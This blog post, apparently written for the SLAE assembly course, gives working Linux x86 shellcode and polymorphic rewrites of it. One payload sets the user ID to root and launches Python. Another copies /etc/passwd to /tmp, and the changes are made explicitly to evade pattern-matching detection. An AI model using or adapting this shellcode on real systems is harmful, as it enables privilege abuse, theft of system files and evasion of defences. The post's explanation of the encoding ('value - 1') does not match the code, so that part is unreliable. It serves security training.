Blog


SLAE: Polymorphic Shellcode

Hi all,
this is the sixth article about SLAE (Security Tube Linux Assembly Expert) course.
This time I need to make polymorphic version of 3 shellcode.

I start from the following shellcode:

; Title: Shellcode Linux x86 [54Bytes] Run /usr/bin/python | setreuid(),execve()
; Date: 8/5/2014
; Author: Ali Razmjoo
; Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]

global _start
section .text
_start:
  xor eax,eax
  mov al,0x46
  xor ebx,ebx
  xor ecx,ecx
  int 0x80
  jmp short call_exec
exec:
  pop ebx
  xor eax,eax
  mov [ebx+0xf],al
  mov [ebx+0x10],ebx
  mov [ebx+0x14],eax
  mov al,0xb
  lea ecx,[ebx+0x10]
  lea edx,[ebx+0x14]
  int 0x80
call_exec:
  call exec
  string: db "/usr/bin/python"

This becomes:
global _start
section .text
_start:
  ; xor eax,eax
  mov ebx,eax
  xor eax,ebx

  std ; added some junk
  mov al,0x46
  xor ebx,ebx
  xor ecx,ecx
  cld ; junk
  int 0x80
  jmp short call_exec
exec:
  pop ebx
  xor eax,eax
  add esi, 0x20 ; junk
  mov [ebx+0x14],al
  mov [ebx+0x15],ebx
  sub esi, 0x20 ; junk
  mov [ebx+0x19],eax
  mov al,0xb
  lea ecx,[ebx+0x15]
  lea edx,[ebx+0x19]
  int 0x80
call_exec:
  call exec
  string: db "///usr//bin///python"

To beat pattern matching I changed /usr/bin/python to ///usr//bin///python and I added some NOP equivalent instruction.
Finally I changed xor eax,eax to his equivalent instruction.

- - -

You can find all the code in the following Github dir!

Here the second polymorphic shellcode: (Look up for the initial shellcode)
global _start
section .text
_start:
  ; xor eax,eax
  mov ebx,eax
  xor eax,ebx

  mov al,0x5
  xor ecx,ecx
  push ecx

  ; push 0x64777373
  mov esi, 0x53666262
  add esi, 0x11111111
  push esi

  ; push 0x61702f63
  mov esi, 0x505f1e52
  add esi, 0x11111111
  push esi

  push 0x74652f2f
  lea ebx,[esp +1]
  int 0x80

  mov ebx,eax
  mov al,0x3
  mov edi,esp
  mov ecx,edi
  push WORD 0xffff
  pop edx
  int 0x80
  mov esi,eax

  push 0x5
  pop eax
  add ecx,0x40 ; junk
  xor ecx,ecx
  push ecx
  push 0x656c6966
  push 0x74756f2f
  push 0x706d742f
  mov ebx,esp
  mov cl,0102o
  push WORD 0644o
  pop edx
  int 0x80

  mov ebx,eax
  push 0x4
  pop eax
  mov ecx,edi
  mov edx,esi
  int 0x80

  xor eax,eax
  xor ebx,ebx
  mov al,0x1
  mov bl,0x5
  int 0x80

This time I changed the pushed string. So first I move into esi the value - 1 and then I add 1 to the resulting value. This part is highlighted in bold.

I applied the same change to the last shellcode.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE - 772